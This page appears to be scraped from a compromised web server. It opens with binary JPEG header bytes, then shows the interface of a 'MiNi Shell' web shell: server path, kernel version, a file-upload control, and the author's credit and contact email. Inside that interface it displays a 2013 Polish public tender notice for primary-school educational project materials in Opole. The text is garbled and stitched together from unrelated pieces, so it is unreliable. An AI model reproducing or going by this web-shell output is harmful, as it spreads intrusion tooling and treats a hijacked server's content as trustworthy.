JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130717/145489-N-2013.html

<p class="kh_header"><b>Opole: Przetarg nieograniczony na usługę edukacyjną polegającą na opracowaniu i dostawie 24 ścieżek edukacyjnych realizowanych metodą projektu  do pracy z uczniami szkół podstawowych umożliwiających rozwijanie zainteresowań  w zakresie przedmiotów humanistycznych oraz matematyczno - przyrodniczych na potrzeby projektu pod nazwą Fascynujący świat nauki i technologii</b><br>
<b>Numer ogłoszenia: 145489 - 2013; data zamieszczenia: 17.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalne Centrum Rozwoju Edukacji , Ul. Głogowska 27, 45-315 Opole, woj. opolskie, tel. 774 579 895, faks 774 552 979.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rcre.opolskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na usługę edukacyjną polegającą na opracowaniu i dostawie 24 ścieżek edukacyjnych realizowanych metodą projektu  do pracy z uczniami szkół podstawowych umożliwiających rozwijanie zainteresowań  w zakresie przedmiotów humanistycznych oraz matematyczno - przyrodniczych na potrzeby projektu pod nazwą Fascynujący świat nauki i technologii.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny</b></p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa edukacyjna polegająca na autorskim opracowaniu i dostawa 24 ścieżek edukacyjnych realizowanych metodą projektu  do pracy z uczniami szkół podstawowych umożliwiających rozwijanie zainteresowań  w zakresie przedmiotów humanistycznych oraz matematyczno - przyrodniczych, w szkołach biorących udział, w projekcje realizowanym przez Regionalne Centrum Rozwoju Edukacji w Opolu finansowanego przez Unie Europejska z Europejskiego Funduszu Społecznego. 
2. Zakres zamówienia obejmuje: a) zakup  4  zestawów ścieżek edukacyjnych opracowanych  metodą projektu edukacyjnego  do pracy z uczniami  klas  I  ( pierwszych )  2  w zakresie przedmiotów humanistycznych oraz 2  matematycznych - przyrodniczych; b) zakup  4  zestawów ścieżek edukacyjnych opracowanych  metodą projektu edukacyjnego  
do pracy z uczniami  klas  II ( drugich)  2 zestawy  w zakresie przedmiotów humanistycznych oraz 2 zestawy matematycznych - przyrodniczych; c) zakup 4  zestawów ścieżek edukacyjnych opracowanych  metodą projektu edukacyjnego  do pracy z uczniami  klas  III ( trzecich) 2 zestawy  w zakresie przedmiotów humanistycznych oraz 2 zestawy matematycznych - przyrodniczych; d) zakup 4  zestawów ścieżek edukacyjnych opracowanych  metodą projektu edukacyjnego  do pracy z uczniami  klas  IV  ( czwartych)  2 zestawy  w zakresie przedmiotów humanistycznych oraz 2 zestawy matematycznych - przyrodniczych; e) zakup 4  zestawów ścieżek edukacyjnych opracowanych  metodą projektu edukacyjnego  do pracy z uczniami  klas  V ( piątych)  2 zestawy  w zakresie przedmiotów humanistycznych oraz 2 zestawy matematycznych - przyrodniczych; f) zakup 4  zestawów ścieżek edukacyjnych opracowanych  metodą projektu edukacyjnego  do pracy z uczniami  klas  VI ( szóstych)  2 zestawy  w zakresie przedmiotów humanistycznych oraz 2 zestawy matematycznych - przyrodniczych.
3. Wszystkie ścieżki /projekty  edukacyjne, w zakresie przedmiotów humanistycznych  zawierają  takie elementy jak: a) poszukiwanie informacji z wykorzystaniem różnych źródeł; b) zadania kształtujące umiejętności planowania działań (pracy i nauki); c) ćwiczenia uwzględniające zajęcia sportowo - rekreacyjne; d) ćwiczenia rozwijające koordynację wzrokowo - ruchową (plastyczne, muzyczne, teatralne).
4. Wszystkie ścieżki /projekty edukacyjne, w zakresie przedmiotów matematyczno - przyrodniczych zawierają takie elementy jak:a) zadania/ćwiczenia uwzględniające doświadczenia z zakresu pomiarów i monitoringu środowiska; b) zadania/ćwiczenia rozwijające umiejętności logicznego myślenia (gry matematyczne, doświadczenia i działania związane dokonywaniem, pomiarów, konstruowaniem i budowaniem prostych elementów).
5. Każda ścieżka/projektu edukacyjnego zawiera: a) elementy związane z potencjałem i możliwościami uczniów tj. uczniami z trudnościami i zdolnościami z zakresu nauk humanistycznych oraz  z trudnościami i zdolnościami z zakresu  nauk matematyczno - przyrodniczych; b) cele dydaktyczne i wychowawcze, stanowiące opis wiadomości i umiejętności, zdobywanych w toku realizacji projektu; c) ustalenie hierarchii poszczególnych elementów zajęć, wraz z podaniem szczegółowego przebiegu zajęć i ich formy, z podziałem na części i czas przeznaczany dla każdej z nich; d) opis metod pracy stosowanych w trakcie realizacji projektu edukacyjnego  (wykładu, pokazów, 
ćwiczeń, doświadczeń); e) proponowaną  ewaluację zajęć, która odpowie na pytanie czy uczniowie uczestniczą-cy w realizacji wybranego  projektu poszerzyli swoja wiedzę i umiejętności z realizowanego obszaru  tematycznego, a nauczycielom, czy udział uczniów w projekcie umożliwia osiąganie przez nich sukcesów edukacyjnych w szkole.  
6. Każda ścieżka projekt edukacyjny jest opracowana w formie zestawu: a) ułożony w książkę  przewodnik  metodyczny dla nauczyciela - w formie elektronicznej oraz papierowej, zawierający: materiał zawierający część teoretyczną i praktyczną, w części teoretycznej znajdują się ogólne informacje na temat zagadnienia, do którego poradnik  został napisany, w części praktycznej znajdują się konkretne wskazówki dla nauczyciela, np. opis zadań, ćwiczeń, metodyki; podpowiedzi jak korzystać z konkretnych rozwiązań; materiał zawiera odniesienia do najnowszej literatury (przypisy, bibliografia); zawiera spis treści. b) płytę CD z prezentacją multimedialną (wymagania techniczne środowiska pracy dla systemu offline: MS Windows XP/Vista/7) zawierającą: prezentację w PowerPoint zawierającą wizualizację omawianych  z uczniami celów, treści i zadań, ćwiczenia, karty pracy, elektroniczną formę scenariusza,przewodnik  metodyczny dla nauczyciela.
7. Minimalne wymagania Zamawiającego dotyczące każdej ścieżki - projektu edukacyjnego odnoszą się do zawartości każdego projektu zaplanowanego na 20 godzin dydaktycznych, który musi uwzględniać: a) cele ogólne ścieżki - projektu; b) cele szczegółowe; c) główne kompetencje kluczowe w klasach I - III oraz IV - IV rozwijane podczas realizacji projektu; d) cele edukacyjne oraz wychowawcze; e) oczekiwane efekty i sposoby zakończenia  projektu przez grupę projektową f) uzasadnienie merytoryczne realizacji projektu; g) harmonogram działań z rozbiciem na : etap projektu, działania nauczyciela, działania uczniów (opis tych działań) czas niezbędny na poszczególne działania; h) scenariusze poszczególnych działań z:  komentarzem metodycznym dla nauczyciela, ćwiczeniami z opisami działań nauczyciela i uczniów, karty ćwiczeń; i) podsumowanie i oceną skuteczności i efektywności działań zrealizowanych w projekcie , wzory dyplomów dla uczniów uczestniczących w projekcie.
8. Zestaw ścieżek musi posiadać co najmniej dwie, rekomendacje/recenzje samodzielnych pracowników naukowych z zakresu dydaktyki o poprawności merytorycznej oraz metodycznej, co zostanie udokumentowane przy odbiorze przedmiotu zamówienia.
9. Wykonawca przenosi na Zamawiającego, w ramach realizacji zamówienia autorskie prawa majątkowe szczegółowo opisane we wzorze umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.52.10.00-2, 80.10.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w celu potwierdzenia posiadania wiedzy i doświadczenia musi wykazać, że należycie wykonał, z zastrzeżeniem art. 26 ust. 2 b ustawy Prawo zamówień publicznych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum 2 usługi edukacyjne o podobnym charakterze, tj. dotyczące opracowania autorskich  programów nauczania lub opracowania i realizacji projektów edukacyjnych dla uczniów szkół podstawowych.
Ocena spełnienia warunku dokonana zostanie na podstawie: a) wykazu głównych usług edukacyjnych, wykonanych (w przypadku świadczeń okresowych lub ciągłych również wykonywanych), w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - z tego okresu, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, przygotowanego wg wzoru - załącznika nr 4 do SIWZ
b) dowodów potwierdzających, że usługi wskazane w wykazie zostały wykonane należycie (np.:  referencje, protokoły odbioru). Dowodami potwierdzającym czy usługi zostały wykonane lub są wykonywane należycie są także: poświadczenie lub inny dokument potwierdzający należyte wykonanie usługi, oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej. Jeżeli Wykonawca składa oświadczenie, zobowiązany jest podać przyczyny braku możliwości uzyskania poświadczenia.
W przypadku gdy Zamawiający (Regionalne Centrum Rozwoju Edukacji) jest podmiotem, na rzecz którego usługi wykazane w wykazie zostały wcześniej wykonane Wykonawca nie ma obowiązku przedkładania dowodów potwierdzających czy usługi te zostały wykonane należycie.
W razie konieczności, szczególnie gdy wykaz usług lub dowody potwierdzające czy usługi zostały wykonane należycie budzą wątpliwości Zamawiającego, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego usługi były wykonywane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  w celu potwierdzenia dysponowania osobami zdolnymi do wykonania zamówienia musi wykazać, że dysponuje minimum 1  osobą posiadającą doświadczenie w  opracowaniu autorskich  programów nauczania lub opracowaniu i realizacji projektów edukacyjnych zrealizowanych  dla uczniów szkół podstawowych, wykształcenie wyższe z przygotowaniem pedagogicznym oraz kwalifikacje kierunkowe do pracy w klasach I - III  nauczanie zintegrowane, wychowanie wczesnoszkolne/ przedszkolne.  
Ocena spełnienia warunku dokonana zostanie na podstawie: wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia  wraz z informacjami na temat ich doświadczenia, niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami sporządzony wg załącznika 5 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz ofertowy według załącznika nr 1 do SIWZ. 2. Pełnomocnictwo w formie oryginału lub kopii poświadczonej notarialnie (w sytuacji, gdy ofertę podpisuje osoba, której prawo do reprezentowania Wykonawcy nie wynika z dokumentu rejestrowego). 3. Jeżeli wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust 1 ustawy Prawo zamówień publicznych polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnym do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie takich podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Przykładowy wzór pisemnego zobowiązania, stanowi załącznika nr 6 do SIWZ. Wykonawca może przedłożyć również zawarte umowy czy oświadczenia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zawarte we wzorze umowy załączonym do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.rcre.opolskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalne Centrum Rozwoju Edukacji 45-315 Opole ul. Głogowska 27 pokój 1.2 - parter.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.07.2013 godzina 10:30, miejsce: Regionalne Centrum Rozwoju Edukacji  ul. Głogowska 27,  pokój 1.2 parter, 45-315 Opole.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest realizowany na potrzeby projektu systemowego nr POKL.09.01.02-16-001/13 pn. Fascynujący świat nauki i technologii, realizowanym w ramach Programu Operacyjnego Kapitał Ludzki Priorytetu IX, Działania 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, współfinansowanym przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, zgodnie z decyzją o dofinansowanie - uchwała ZWO nr 3514/2013 z dnia 28 marca 2013r.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com